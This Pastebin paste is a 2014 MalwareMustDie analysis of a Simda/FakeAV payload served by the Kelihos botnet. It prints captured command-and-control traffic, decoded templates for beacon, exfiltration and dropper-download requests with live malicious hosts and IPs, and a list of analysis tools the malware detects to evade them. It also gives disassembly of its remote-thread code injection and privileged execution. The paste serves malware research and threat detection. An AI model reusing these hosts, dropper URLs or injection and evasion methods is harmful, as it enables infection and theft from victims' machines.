Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // =========================================
- // #MalwareMustDie!
- // Kelihos botnet served payload analysis
- // Simda payload, downloader of FakeAV
- //
- @unixfreaxjp /malware/temp]$ date
- Mon Feb 10 21:14:53 JST 2014
- // =========================================
- // first the sample info + VT link:
- -----------------------------------------------------------
- Sample : ./sample.mmd
- MD5 : 2cc3c5c253997c73781de81bf0cdd405
- SHA256 : bd82111305cbaf7c5fd1d33f3e7f55f3f7b8a2ed402abd4ede0adeb3037960c9
- VT URL : https://www.virustotal.com/en/file/bd82111305cbaf7c5fd1d33f3e7f55f3f7b8a2ed402abd4ede0adeb3037960c9/analysis/1392034168/
- Detection ratio: 31 / 50
- -----------------------------------------------------------
- // main course...
- //================================
- // Decoding of of the CNC Traffic
- // Compare the traffic to reverse
- // binary result to get the crack
- // logic.
- //
- // Noted: I did this "my way"
- // Adding here and there analysis to -
- // find something new..
- //================================
- // ---------------------------------------
- // TRAFFIC #1
- // requesting for the setup beacon..
- // ---------------------------------------
- GET /?7y31731=%96%C9%A5%A6%A6%D8c%AA%A6%97%9B%D8ll%9B%9
- 8%AFf%98m%CE%DE%5E%98%A3%A1%9D%DEi%93l%96%97%98%DC%E6%A
- C%E9%EA%86%C7%99%AA%9E%D7rffh%AFf%5B%A1%DB%E0k%C7%D4%9A
- z%C1Y%9E%A0%97n%A6%A9%B5%A5%B5%ADd%AD%ACwh%B4l%7Bmz%B1l
- wf%B3%AAa%A4%A3%B3n%BCwjjvW%E4%CA%E3%AC%A2%A4%5E%A7%A3h
- f%A3eeef%A9eee%9D%A9%5E%93%95%E3t%A9cagcb%B8%9B%96%E1%E
- C%B1a%A9%97 HTTP/1.1
- Host: report.ws55s5555y555my.com
- User-Agent: Mozilla/4.0 (compatible; MSIE 8.0;
- Trident/4.0;
- .NET CLR 2.0.50727;
- .NET CLR 1.1.4322;
- .NET CLR 3.0.04506.590;
- .NET CLR 3.0.04506.648;
- .NET CLR 3.5.21022;
- .NET CLR 3.0.4506.2152;
- .NET CLR 3.5.30729)
- // Reversed..
- //...shows the domain (the same domains as captured)
- 4258f0: report.ws55s5555y555my.com <=== good, got the howtos here..
- //next...with cracked urls:
- 4114f8: /?abbr=RTK&setupType=update&uid=%d&ttl=%s&controller=microinstaller&pid=3 <== #w000t!!
- //templates:
- $%s&controller=sign&data=%s&oldmid=%s&mid=%s$
- // ---------------------------------------
- // TRAFFIC #2
- // POSTING the Infection PC ID..
- // ---------------------------------------
- POST / HTTP/1.1
- Host: report.ws55s5555y555my.com
- User-Agent: Mozilla/4.0 (compatible; MSIE 8.0;
- Trident/4.0;
- .NET CLR 2.0.50727;
- .NET CLR 1.1.4322;
- .NET CLR 3.0.04506.590;
- .NET CLR 3.0.04506.648;
- .NET CLR 3.5.21022;
- .NET CLR 3.0.4506.2152;
- .NET CLR 3.5.30729)
- Content-Length: 5476
- Content-Type: application/x-www-form-urlencoded
- 31yWS=%96%97%D1%D3%A3%AA_%AA%A7hi%D6feg%97%A9eln%CE%B1b
- %94%D3%CE%94%96%AC%BB%88%A2%95%96%E1%D3%EBk%EA%E1fe%A3n
- gnn%AFmi%94%E4%E2_%95%A8%A5ic%B2%8C%84%A2%9E%A1%9F%AB%A
- 7e%AC%A3%94%A4%E0kkhf%B2nik%A1%A9%5E%95%A0%A5ib%B2%8B%8
- 8%A9%9D%A6%9F%A3%AC%8F%AE%A3%98b%D8%96%9Aib%ADeil%9A%DA
- d%9C%A6%9A%95%97%DC%8D%B6%A8%96%A2%A8%D6%A7%91%D6%D2if%
- A7iebi%AAibi%9E%ADb%93%A7%A2%60e%AA%8B%87%A2%C4%CF%A2%A
- 4%AD%5E%AD%ABfj%A5%5B%AC%ABr%F0%AB%8D%85%93%EE%97%C7%AC
- %9Edd%AF%88y%DE%D3%D7%AC%D6%D9%5B%BA%BB%5B%A2%DC%99riy%
- BEkxn%A3%AFg%A5%A2%AEjw%B1%9C%8B%A9%A7%A1%B5%A3%A7o%AB%
- B9lx%B7nhx%5B%EB%9A%A8r%9D%A9%5E%93%9F%A0da%A9%87%83%A3
- %95%A0%9F%A2%A4%5E%A7%A3%5B%AB%B0eeee%A9f%7Bk%93%EB%A8%
- A0%A2%9FY%A3%DE%C7%C2%E4%D9%AD%C2%E1%DA%A2%C0%E1%A8%A9%
- D4%A1%A1%5B%A8%E8%9B%A9r%AE%DD%9D%C5%D4%8Dy%9D%DA%CA%BB
- %92%B5%DC%D0%EB%D9%A0%97%A4fU%B4%98%A9%9E%AB%DE%8DB%3F%
- AE%CDw%83%9C%8Dw%9A%DE%C5%C6%E6%D5%E2%DE%D9%E6%8F%E4%E0
- U%AF%E8%A7Uy%9A%E2%A3%A8%A9%CE%E5%9A%C4%E3%D6%A2%9F%99%
- BB%B8%E4%85%C3%DE%D8%E8%A5%D8%E5%9AB%7Dv%AA%A9%A4%C2%A9
- U%AB%A0%A7a%91%A7%9Bd%3E%83%9A%96%DE%CA%D1%DD%D7%E6%3B%
- 81%BC%A3%A9%D8%A1%5D%87%5E%99%7C%A7%96%DD%E1%97%C6%E2%8
- D%80%96%DD%C0%B4%92%A6%D3%D2%D7%E0%93%E9%D4%A9%A4%E5Uy%
- A7%9E%EF%9A%A7Bw%C2%9C%D7%D4%D9%E1Q%C6%B8%C1%D3%CC%D5%D
- C%D7%E2%A2%A4%B8%A3%9C%DC%A3%9Ab~%E7%A9%9A%A7%D3%DA%91%
- C8%7Cw%8A%9A%E7%BB%C2%E9%D8%90%B8%E0%E8%93%E9%E1%9A%A9%
- 93z%AD%A5%A1%E8%A7%9A%A7%8D%B1%3Bm%C2%D6%96%99%DE%C9%BB
- %D7%CE%E4%E2%E7%E4%92%D8%E7%9AU%D9%31%A7U%8C%E2%A3%99%A
- 4%E4%ECN%AC%DD%E1%98%A3%E7%BC%C7%92%AA%E8%DF%DE%E3%A0%D
- C%E5Um%93%5D%80wg%ADnlk%A1%A9Wpy%C0%9C%94%E1%BC%C5%DA%C
- A%D9%E3%E5%E9%9E%DB%D4%A9%9A%93%9B%31%A7U%D0%9E%A3%99%D
- C%F0%A1%83%B8%DB%A7%96%EB%C5%B8%E6%85%B5%E7%E2%E0%9D%E9
- %D8%A7U%ABU%5D%80w%ABjfe%A2%AC_%8C%7Cw%7B%A0%ED%BD%BC%E
- A%85%D6%6B%E4%94%85%E0%E1%99%A4%EA%A8U%8D%85%99%5D%80w%
- A6%AFg%93%A7%A1%5C%3E%83%A0%C1%E6%CA%DC%1D%92%B5%91%EB%
- DC%AB%9A%A0%82%96%A3%96%E0%9A%A2%9A%DB%ED%5B%B7%D4%D0%9
- B%9F%E8%C3%C2%D9%CE%D5%7C%7C%C1%97%DA%E5%A4%A8%E2%9B%A9
- Uc%C7z%89U%B3%EB%8F%D0%D4%E4%A2%A3%E4w%86%A0%9A%90%BB%D
- 3%E2%95%EC%D4%9C%9A%93%85%96%98%A0%99%88%85f%8D%A6N%A7%
- B4%C2%40%3B%C6%C0%B6%E4%D4%E3%DE%D8%E8N%A5%C1z%89%93%7B
- %A7%96%A2%DE%AC%A4%A7%D8%99a%91%A4%8D%86%81%AAd%5D%BF%C
- E%D3%E1%E1%E7%9D%DD%E7Ux%E2%A2%A5%A7%9A%EC%A8%9E%A4%DB%
- 99q%CF%D8%D2%A1%A5%99%A7%B4%D5%D0%90%A0%A0%A4N%DD%E2%A7
- U%CA%9E%A3%99%A4%F0%A8U%8D%BD%868%BA%D8%DB%97%A0%F0%CAs
- %BF%CA%D4%D8%D3%94t%E6%E5%A2%96%E7UffU%EB%AA%A3%A9%D6%E
- 6%93py%C4%9C%9F%DD%C6%CA%E5%85%BD%D4%D6%DD%8F%97%C3%A1%
- 96%EC%9A%A7Uf%AAB%3F%82%D6%DC%A0%D2%E2%DC%99%A5%99%AC%C
- 6%D7%D7%9D%BC%E1%D8%93%97%B7%A7%9E%E9%9A%A7U%7B%EB%96%A
- 2%9A%E4%E8%A0%CE%8F%B3%98%92%ED%CC%C5%D7%85%C0%D0%D5%DF
- N%A8%A1eB%7D~%A3%A9%9A%E5%5D%87%5E%8D%C9%80%B2%8F%BB%98
- %A5%F0%C6%C5%DD%85%B3%DE%E0%E2%93%DA%E7%9E%A4%E1%A8Ufg%
- A7fcf%9F%A7%5Epy%BA%9C%94%EB%C6%C6%E1%CB%E4%8F%C1%DA%94
- %E0%D6%9AU%C3%A7%A4%9B%9A%EC%A8%9E%A4%DB%DA%9A%83%B4%D1
- %9C%A5%E2%C6%C1%92%97%A0%9F%A5%818%CE%DC%A3%97%E2%A3%99
- U%89%C9%82Uy%D2%EF%97%C6%D4%8Dw%A3%E2%CD%B8%E4rz%C6%DB%
- E2%92%E6%EA%A8U%B7%9A%9B%9A%A3%DD%9A%A7Bw%C6%97%C6%E1%D
- C%A6%A0%DF%CBs%A0%B3%B5%C3%92%BA%A0%D8%E0%9A%AC%E2%A7%A
- 0Uh%A7eU%88%D2%EB%A4%CC%D2%D2S%81%DA%BA%BE%92%97%7Dy%B3
- %D8%9D%D9%D8U%87%D8%96%99%9A%A7%99nci%9B%A9%3Bm%BC%D6%9
- 6%A3%E8%CA%C2%D8%D9%90%9D%C0%B9%82%97%B9%A7%96%E0%9A%AC
- %A4%A7%E4Ugc%9D%99%81%C8%E1%E3%9C%94%DEw%A3%D3%C8%DB%8F
- %A4%818%C4%DC%98%A7%E2%A8%A4%9B%A9%99c%83z%C1%99t%D5%D0
- %DA%98%A8%E8%C9%BE%92%98%9E%9F%92%C7%93%E9%E9%9E%98%D8U
- %85%96%98%E4UgU%B9%DA%9C%CA%E4%CE%9A%96%99%A7%B4%D5%D0%
- 90%9C%92%B8s%CC%80%3F%82%DC%98%A7%A4%A8%E8%9B%A9U%9B%C7
- s%B7%8F%B3%A5%92%E6%BC%CA%E1%D7%DB%8F%A4%A2%5E%97%C6%9A
- %A7%E9%9E%98%9AU%C9%96%98%A0%8D%ABN%AF%D0%DB%9A%A6%DA%B
- E%B8%92%B5%D1%D2%DD%94%5B%97%B7z%8A%80%3F%89%AC%9A%DA%A
- 0%AA%9E%8D%C9%9D%DA%D4%DF%A7%A0%F2w%B9%E1%D7%90%C6%DB%E
- 2%92%E6%EA%A8U%CB%85B%3F%88%DE%98%AA%A7%D6%ED%A7%83%C4%
- DD%97%92%ED%BCs%D8%D4%E2%8F%BF%DD%91%E9%E2%A8%A4%D9%A9U
- c%83%BE%89U%7B%DF%DA%9B%C8%E6%DC%A5%9C%99%8A%81%A7%85%C
- 3%BF%A3%94V%C2%B5gi%A4kilh%A2B%3F%7D%DC%ED%94%CC%E7%8D%
- 99%A0%EBw%A0%DB%C8%E2%DE%E5%E3%94%EB%93c%83%B8%89U%7B%A
- 7%DA%A2%9A%AC%DC%EB%99%83%A2%9BhQ%CC%A7%84%92%8D%BB%B1%
- AB%A9a%AC%ACj%5E%80%3F%7D%A4%A9%DF%9E%ADU%D3%E8%A0%83%B
- C%D6%96%A3%E8%CA%C2%D8%D9%90%9D%C0%B9%82%97%B9%A7%96%E0
- %9A%AC%A4%A7%E4Uhc%A2%99%81%B3%A0%8D%5B%7C%BB%90%88%AA%
- 99%A8%A3%9B%818%CA%E2%AA%A3%D7%82v%8DB%83%82%9E%98%DF%E
- 8%A1%D2%D5%E1S%87%E2%CA%C8%D3%D1%90%B2%9D%9FN%A9%A3fe%9
- 3U%ADmk%99%87%9A%99%D6%EC%A2%D5%D8%CF%A8%A5%DA%B9%BF%D7
- %85%9D%8F%A3%A4%5C%A7%A1ie%A5fnB%3F%9F%A5%A7%A4%D0%B6%8
- 9%B6%E8%E0%A7%96%E6w%A3%E4%D4%D3%D4%E5%E7%8B%84%7D%88%A
- E%E6%A9%9A%A2B%83%A8%A2%A8%E0%A7%93%DB%D4z%3D%94%EC%C9%
- C6%E5%93%D5%E7%D7%818%EE%DC%A3%A1%E2%9C%A4%A3c%DE%AD%9A
- Bw%EC%93%D5%E5%D6%96%96%EC%85%B8%EA%CA%7Dy%DE%E7%8F%EA%
- E6c%9A%EB%9AB%3Fy%BF%88%9A%A7%E3%A7%93%DB%D4z%3D%A4%EF%
- BA%BB%E1%D8%E4%9D%D7%EC%93%84%7D%A8%AB%D6%9D%A4%A8%A9%A
- 7%9A%AD%9Az%83%A1%D9%D2%D5%A2%A4%ED%85%B8%EA%CA%7Dy%E5%
- EA%91%DF%E2%A8%A9%A1%9A%AD%9AB%83%9A%AD%A5%D9%E8%A0%C8%
- E1%9B%98%A9%DEd%5D%E5%D5%DF%DE%DE%E7%A4%A5%D8%AD%9A%80%
- 3F%A8%A2%96%F1i%A5%A3%DD%A7%93%DB%D4z%3D%84%C6%B8%CB%A6
- %93%D5%E7%D7%818%DA%E7%9B%A2%E2%A3c%9A%AD%DEB%3F%A7%E2%
- E7%92%CF%DB%A0e_%DE%CF%B8%7Fo%E3%E5%D5%DC%9D%EA%E7c%9A%
- EB%9AB%3F%96%ED%98%9D%A0%E0%EB%A4%91%D4%E5%98%3E%83%A3%
- A0%C5%93%D5%E7%D7%818%CC%C1%88c%D8%AD%9AB%3F%DA%A1%9Cc%
- D2%F1%93py%B3%A5%AB%CC%CB%B4%E6%CA%A2%DA%A0%D9%A6%DC%80
- %3F%AC%E0%9E%A5%A7%AB%EC%9Ac%9A%E5%DE%3Bm%C2%E6%A6%A5%D
- E%C4%60%7C%B8%E9%E2%E6%D9%9B%84%7D%88%AE%E6%A9%9A%A2B%8
- 3%88%AE%A8%E1%DE%9Bpy%C0%AC%A4%ED%BC%C0%7Fo%E7%DC%DB%E4
- %A0%ED%E6%9Ac%D8%AD%9AB%3F%CC%AE%A8%A9%D2%E6%3Bm%D0%D4%
- A1%96%EC%CB%BC%A0%CA%E8%D4%7F~R
- // Template of this POST command is:
- 410fe8: POST %s HTTP/1.1 Host: %s User-Agent: %s
- Content-Length: %d
- Content-Type: application/x-www-form-urlencoded
- %s
- // values decrypted is:
- 4259f0: wv=wvXP&
- uid=11361&
- lng=de-CH&
- mid=4DE6C9669B3A7F8E87B1F13A4F7CD93C&
- res=00000320000100000000&
- v=000001F6
- &rz=32
- //template grabbed in reversing:
- 411198: wv=%s&uid=%d&lng=%s&mid=%s&res=%s&v=%08X&rz=%d
- // [...] and so on..(I think↑ is enough for evidence..
- // Obviously infected PC information was sent..
- // ---------------------------------------
- // REQUEST #3
- // Here goes the FakeAV mess....
- // ---------------------------------------
- GET /?de=kayoyZWnmmKfmJikqpfJ2m6nl2qmpGeZ0qTZ0cnCqZuRkc
- jS3evY0%2BCk1KZ26NiV0ZXR1uTFnsfZY9KazZ%2FiqZ3NdZWjpdncl
- 8espK3VmJSpmWKempiiqMvKqnDSZWqqqGTGptHW1cWWqshU2M7HrKuq
- qap7qGpvrrFhpKazrbWcmLaWdJyYpKO9nae4caJ3XQ%3D%3D HTTP/1.1
- Host: update.kecowfdt8o49uo.com // unexists!!
- User-Agent: Mozilla/5.0 (Windows NT 6.1;
- WOW64; rv:2.0b8pre) Gecko/20101114 Firefox/4.0b8pre
- Connection: Keep-Alive
- // Reversed...
- Coded template:
- 410ac8: update%s.%s.com <=== we know how the decode form
- // Thanks to hosts overwriting the access received the motherhost!!
- // Response:
- HTTP/1.1 200 OK
- Server: nginx
- Date: Mon, 10 Feb 2014 10:07:09 GMT
- Content-Type: text/html
- Transfer-Encoding: chunked
- Connection: close
- X-Powered-By: PHP/5.3.16
- 80
- 2513465194980a70c6d814d5db21b2432f5b82a099664ea242f5bd0
- 20459550cb45a50e1c47aac060a347d652cf549e2869ddb7e020995
- 2b573f8a370fe58f9d
- 0
- // so ..hostname are encoded..
- // cracked:
- http://update1.highguarded.com // <=== #w00tw00t!!
- // The GET request also different encoding, cracked;
- /?abbr=RTK&action=download&setupType=drop64&setupFileName=dropper64.exe #w00tw00t!!
- //PoC:
- http://urlquery.net/queued.php?id=65248966
- https://www.virustotal.com/en/url/8363fdd4899e1f544f4f2b626ce985be85f4cfab0e62ce3f33ac05df4b496280/analysis/1392037874/
- // traces of binary saved:
- 4114b5: %temp%\11361.sys
- 4114a8: %temp%/update_c1eec.exe
- 4123c8: %appdata%\ScanDisc.exe
- // maybe changes(random), has seeds..go figure?
- // PS: These "WannaFoolMe" request are fakes.. Noted: MMD is not that fools:
- 411394: Host: update1.randomstring.com User-Agent: IE7
- 411394: Host: update1.randomstring.com User-Agent: IE7
- 411554: Host: update1.randomstring.com User-Agent: IE7
- 4114c4: Host: update1.randomstring.com User-Agent: IE7
- [...]
- //---------------------------------------
- // ETC TRAFFIC...
- // AND THE NEXTS (REQUEST OF SAME PATTERN)
- // ---------------------------------------
- GET /?I17q20=%96%C6%A6%A6%A6%D9%60%AF%A3el%D8%9B%99hj%A
- C%96im%D2%DCe%96%D1%A2%7C%97k%A6bh%D6%8B%E7%E5%AF%EB%A4
- %CF%C3%5B%AA%DC%99rff%ACkf%5B%D9%E7%95%A0%D3%D2vt%7F%97
- %9F%99%D6%A2%A4%B3%B7%AAq%B0%A9kn%B5hvl%7B%B1zml%AF%AAt
- %94%A2%AE%7Dwn%B4vi%A5%A8%96%E1%D7%E7k%A7%A3ee%A3geee%A
- 9efe%9D%A9%5E%93%9F%9DyW%AD%AEb%60%A2%95%A0%A0%B8%AAT%E
- 9%EDrh%A5Y HTTP/1.1
- Host: report.ws55s5555y555my.com
- User-Agent: Mozilla/4.0 (compatible; MSIE 8.0;
- Trident/4.0;
- .NET CLR 2.0.50727;
- .NET CLR 1.1.4322;
- .NET CLR 3.0.04506.590;
- .NET CLR 3.0.04506.648;
- .NET CLR 3.5.21022;
- .NET CLR 3.0.4506.2152;
- .NET CLR 3.5.30729)
- (( no response..is a beacon, leave it!))
- // Autoruns..
- 413fb0: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
- // Spam trace???.. hmm..not good!!
- //..partial decoded strings..
- 41134c: v=spf1 a mx ip4:%d.%d.%d.%d/%d ?all
- // payload was checking these applications:
- EtherD.exe
- Regshot.exe
- ollydbg.exe
- ZxSniffer.exe
- Syser.exe
- CamRecorder.exe
- wspass.exe
- SymRecv.exe
- SbieSvc.exe
- ERDNT.exe
- SandboxieDcomLaunch.exe
- irise.exe
- IrisSvc.exe
- vba32arkit.exe
- DrvLoader.exe
- SUPERAntiSpyware.exe
- %appdata%\ScanDisc.exe
- VBoxTray.exe
- tcpdump.exe
- SandboxieRpcSs.exe
- CamtasiaStudio.exe
- ERUNT.exe
- Sniffer.exe
- wireshark.exe
- dumpcap.exe
- VBoxService.exe
- cv.exe
- Aircrack-ngGui.exe
- WinDump.exe
- observer.exe
- windbg.exe
- PEBrowseDbg.exe
- // here is the responsible spot for getting the payload URL..
- // rewriting the "hosts" trace
- 413010: # This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
- # source server
- 412c74: # Copyright (c) 1993-2006 Microsoft Corp.
- 413060: # This file contains the mappings of IP addresses to host names. Each
- 4131f4: # lines or following the machine name denoted by a # symbol.
- 412de0: # The IP address and the host name should be separated by at least one
- 412e2c: # space.
- 412ef8: # 102.54.94.97 rhino.acme.com
- 412f40: # 38.25.63.10 x.acme.com # x client host
- // added nasty stuff to download from update.kecowfdt8o49uo.com
- // Post Installation contacted IP:
- IP PORTS
- ------------------------
- 5.61.32.192 22
- 79.142.66.240 22 80 443
- 5.149.248.85 22 80
- 92.123.68.97 80 443
- // IP GEO info:
- 5.61.32.192||16265 | 5.61.32.0/20 | LEASEWEB | DE | 3NT.COM | 3NT SOLUTIONS LLP
- 79.142.66.240|hosted-by.altushost.com.|60778 | 79.142.64.0/22 | FELICITY | NL | ALTUSHOST.COM | ALTUSHOST B.V.
- 5.149.248.85||59711 | 5.149.248.0/23 | FORTUNIX | NL | HOSTZEALOT.COM | FORTUNIX NETWORKS L.P.
- 92.123.68.97|a92-123-68-97.deploy.akamaitechnologies.com.|1299 | 92.123.68.0/24 | TELIANET | GB | AKAMAI.COM | AKAMAI TECHNOLOGIES
- // ADDITIONALS..PERSONAL MEMOs....
- // OpenSearch XML in the binary builder for traces??? #LOL
- 40c674: </Arguments </Exec </Actions </Task <!--00--
- 40c3ec: <Actions
- 4138bc: <Param name="q" value="{searchTerms}"/
- 4134bc: <DescriptionSearch for the best price.</Description
- 413540: <Image width="16" height="16"data:image/x-icon;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAIAAACQkWg2AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAaRJREFUeNpiVIg5JRURw0A0YAHio943kYV%2B%2Ff33%2BdvvX7%2F%2FMjEx8nKycrGzwKXOiPKzICvdeezLhCV3jp15%2Bfv%2FX0YGhv8
- 41384f: e2LCC4AAAwAyjg7ENzDDWAAAAABJRU5ErkJggg%3D%3D</Image
- // Code injection w/WriteProcessMemory(KERNEL32.DLL)
- Code function: 0_2_0x4092CB VirtualAllocEx,GetLastError
- ,GetLastError,CloseHandle,WriteProcessMemory,GetLastErr
- or,CloseHandle,GetModuleHandleW,GetProcAddress,CreateRe
- moteThread,GetLastError,CloseHandle,CloseHandle,WaitFor
- SingleObject,CloseHandle
- 0x40930F call dword ptr [0x40C0C8h] "VirtualAllocEx@KERNEL32.DLL" (Import, 5 Params)
- 0x409315 mov esi, dword ptr [0x40C180h] "GetLastError@KERNEL32.DLL" (Import, Unknown Params)
- 0x40931B mov dword ptr [ebp-08h], eax
- 0x40931E call esi "GetLastError@KERNEL32.DLL" (Import, Unknown Params)
- 0x409320 mov dword ptr [ebp-0Ch], eax
- 0x409323 cmp dword ptr [ebp-08h], ebx
- 0x409326 jne 0x40933Dh target: 0x40933D
- 0x409328 push dword ptr [ebp-04h]
- 0x40932B call dword ptr [0x40C130h] "CloseHandle@KERNEL32.DLL" (Import, 1 Params)
- 0x409331 mov dword ptr [004257ECh], 00000007h
- 0x40933B jmp 0x4093B2h target: 0x4093B2
- 0x40933D push ebx xref: 0x409326
- 0x40933E push edi
- 0x40933F push dword ptr [ebp+08h]
- 0x409342 mov edi, dword ptr [ebp-04h]
- 0x409345 push dword ptr [ebp-08h]
- 0x409348 push edi
- 0x409349 call dword ptr [0x40C0BCh] "WriteProcessMemory@KERNEL32.DLL" (Import, 5 Params) ?? <=== here..
- 0x40934F test eax, eax
- // Code Exectution "ShellExecuteW"
- Code function: 0_2_0x4033C0 DialogBoxParamW,memset,mems
- et,memset,wcsstr,wsprintfW,ExpandEnvironmentStringsW,Co
- pyFileW,wsprintfW,ShellExecuteW,GetLastError,
- 0x4033C0 push ebp xref: 0x402626
- 0x4033C1 mov ebp, esp
- 0x4033C3 sub esp, 00000618h
- 0x4033C9 push esi "DialogBoxParamW@USER32.DLL" (Import, 5 Params)
- 0x4033CA push edi
- 0x4033CB xor eax, eax
- 0x4033CD mov esi, 00000206h
- 0x4033D2 push esi
- 0x4033D3 xor edi, edi
- 0x4033D5 mov word ptr [ebp-00000208h], ax
- 0x4033DC lea eax, dword ptr [ebp-00000206h]
- 0x4033E2 push edi
- 0x4033E3 push eax
- 0x4033E4 call 0x40B208h "memset@MSVCRT.DLL" (Import, 0 Params) target: 0x40B208
- 0x4033E9 xor eax, eax
- 0x4033EB push esi
- 0x4033EC mov word ptr [ebp-00000410h], ax
- 0x4033F3 lea eax, dword ptr [ebp-0000x40Eh]
- 0x4033F9 push edi
- 0x4033FA push eax
- 0x4033FB call 0x40B208h "memset@MSVCRT.DLL" (Import, 0 Params) target: 0x40B208
- 0x403400 xor eax, eax
- 0x403402 push esi
- 0x403403 mov word ptr [ebp-00000618h], ax
- 0x40340A lea eax, dword ptr [ebp-00000616h]
- 0x403410 push edi
- 0x403411 push eax
- 0x403412 call 0x40B208h memset@MSVCRT.DLL (Import, 0 Params) target: 0x40B208
- 0x403417 push 00413EA0h UTF-16 "Temp\Low"
- 0x40341C mov esi, 00414910h UTF-16 "C:\agnesti.exe"
- 0x403421 push esi UTF-16 "C:\agnesti.exe"
- 0x403422 call dword ptr [0x40C370h] "wcsstr@MSVCRT.DLL" (Import, Unknown Params)
- 0x403428 add esp, 2Ch
- 0x40342B test eax, eax
- 0x40342D je 0x40348Bh target: 0x40348B
- 0x40342F push 00000009h
- 0x403431 lea eax, dword ptr [ebp-00000410h]
- 0x403437 push eax
- 0x403438 push 00000005h
- 0x40343A pop eax
- 0x40343B call 0x4068FEh target: 0x4068FE
- 0x403440 lea eax, dword ptr [ebp-00000410h]
- 0x403446 push eax
- 0x403447 push 00413EB4h UTF-16 "%TEMP%"
- 0x40344C lea eax, dword ptr [ebp-00000618h]
- 0x403452 push 00413EC4h UTF-16 "%s\%s.exe"
- 0x403457 push eax
- 0x403458 call dword ptr [0x40C248h] "wsprintfW@USER32.DLL" (Import, 0 Params)
- 0x40345E add esp, 10h
- 0x403461 push 00000104h
- 0x403466 lea eax, dword ptr [ebp-00000208h]
- 0x40346C push eax
- 0x40346D lea eax, dword ptr [ebp-00000618h]
- 0x403473 push eax
- 0x403474 call dword ptr [0x40C1A4h] "ExpandEnvironmentStringsW@KERNEL32.DLL" (Import, 3 Params)
- 0x40347A push edi
- 0x40347B lea eax, dword ptr [ebp-00000208h]
- 0x403481 push eax
- 0x403482 push esi UTF-16 "C:\agnesti.exe"
- 0x403483 call dword ptr [0x40C16Ch] "CopyFileW@KERNEL32.DLL" (Import, 3 Params) //<== See??
- 0x403489 jmp 0x4034A1h target: 0x4034A1
- 0x40348B push esi UTF-16 "C:\agnesti.exe" xref: 0x40342D
- 0x40348C lea eax, dword ptr [ebp-00000208h]
- 0x403492 push 00413ED8h
- 0x403497 push eax
- 0x403498 call dword ptr [0x40C248h] "wsprintfW@USER32.DLL" (Import, 0 Params)
- 0x40349E add esp, 0Ch
- 0x4034A1 push 00000003h xref: 0x403489
- 0x4034A3 push edi
- 0x4034A4 push 00413B60h UTF-16 "/param"
- 0x4034A9 lea eax, dword ptr [ebp-00000208h]
- 0x4034AF push eax
- 0x4034B0 push 00413EE0h UTF-16 "runas"
- 0x4034B5 push edi
- 0x4034B6 call dword ptr [0x40C21Ch] "ShellExecuteW@SHELL32.DLL" (Import, 6 Params) // <=== See??
- 0x4034BC cmp eax, 20h
- 0x4034BF jnle 0x4034C9h target: 0x4034C9
- 0x4034C1 call dword ptr [0x40C180h] "GetLastError@KERNEL32.DLL" (Import, Unknown Params)
- 0x4034C7 mov edi, eax
- 0x4034C9 mov eax, edi xref: 0x4034BF
- 0x4034CB pop edi
- 0x4034CC pop esi
- 0x4034CD leave
- 0x4034CE ret function end
- // Remote Process(Read: thread) Writing:
- Code function: 0_2_0x4092CB VirtualAllocEx,GetLastError
- ,GetLastError,CloseHandle,WriteProcessMemory,GetLastErr
- or,CloseHandle,GetModuleHandleW,GetProcAddress,CreateRe
- moteThread,GetLastError,CloseHandle,CloseHandle,WaitFor
- SingleObject,CloseHandle,
- 0x409371 push 0x40CAB8h ASCII "LoadLibraryW"
- 0x409376 push 0x40CAC8h UTF-16 "kernel32"
- 0x40937B call dword ptr [0x40C158h] "GetModuleHandleW@KERNEL32.DLL" (Import, 1 Params)
- 0x409381 push eax
- 0x409382 call dword ptr [0x40C0E8h] "GetProcAddress@KERNEL32.DLL" (Import, 2 Params)
- 0x409388 push eax
- 0x409389 push ebx
- 0x40938A push ebx
- 0x40938B push edi
- 0x40938C call dword ptr [0x40C0D0h] "CreateRemoteThread@KERNEL32.DLL" (Import, 7 Params) // <<== here here!
- 0x409392 mov dword ptr [ebp+08h], eax
- 0x409395 call esi GetLastError@KERNEL32.DLL (Import, Unknown Params)
- 0x409397 mov esi, dword ptr [0x40C130h] CloseHandle@KERNEL32.DLL (Import, 1 Params)
- // Downloading via WININET.DLL...
- 0040A4CA call dword ptr [0040C268h] "InternetConnectA@WININET.DLL" (Import, 8 Params)
- 0040A4D0 mov dword ptr [ebp-18h], eax
- 0040A4D3 cmp eax, ebx
- 0040A4D5 je 0040A610h target: 0040A610
- 0040A4DB push esi ASCII "79.133.196.94"
- 0040A4DC push 00000001h
- 0040A4DE push 00400000h
- 0040A4E3 push ebx
- 0040A4E4 push ebx
- 0040A4E5 push ebx
- 0040A4E6 push dword ptr [ebp+10h]
- 0040A4E9 push 00410A4Ch ASCII "GET"
- 0040A4EE push eax
- 0040A4EF call dword ptr [0040C278h] "HttpOpenRequestA@WININET.DLL" (Import, 8 Params)
- 0040A4F5 mov esi, eax
- 0040A4F7 mov dword ptr [ebp+08h], esi
- 0040A4FA cmp esi, ebx
- 0040A4FC je 0040A602h target: 0040A602
- 0040A502 push dword ptr [ebp+14h]
- 0040A505 lea eax, dword ptr [ebp-00000118h]
- 0040A50B push 00410A50h ASCII "Host: %s"
- 0040A510 push eax
- 0040A511 call dword ptr [0040C2E0h] sprintf@MSVCRT.DLL (Import, 0 Params)
- 0040A517 add esp, 0Ch
- 0040A51A push A0000000h
- 0040A51F push FFFFFFFFh
- 0040A521 lea eax, dword ptr [ebp-00000118h]
- 0040A527 push eax
- 0040A528 push esi
- 0040A529 call dword ptr [0040C27Ch] "HttpAddRequestHeadersA@WININET.DLL" (Import, 4 Params)
- 0040A52F test eax, eax
- 0040A531 je 0040A5F4h target: 0040A5F4
- 0040A537 push ebx
- 0040A538 push ebx
- 0040A539 push ebx
- 0040A53A push ebx
- 0040A53B push esi
- 0040A53C call dword ptr [0040C274h] "HttpSendRequestW@WININET.DLL" (Import, 5 Params)
- 0040A542 test al, al
- 0040A544 je 0040A5F0h target: 0040A5F0
- 0040A54A mov esi, 00000082h
- 0040A54F push esi
- 0040A550 call dword ptr [0040C2E8h] malloc@MSVCRT.DLL (Import, 0 Params)
- 0040A556 push esi
- 0040A557 push ebx
- 0040A558 push eax
- 0040A559 mov dword ptr [ebp+10h], eax
- 0040A55C mov dword ptr [edi], eax
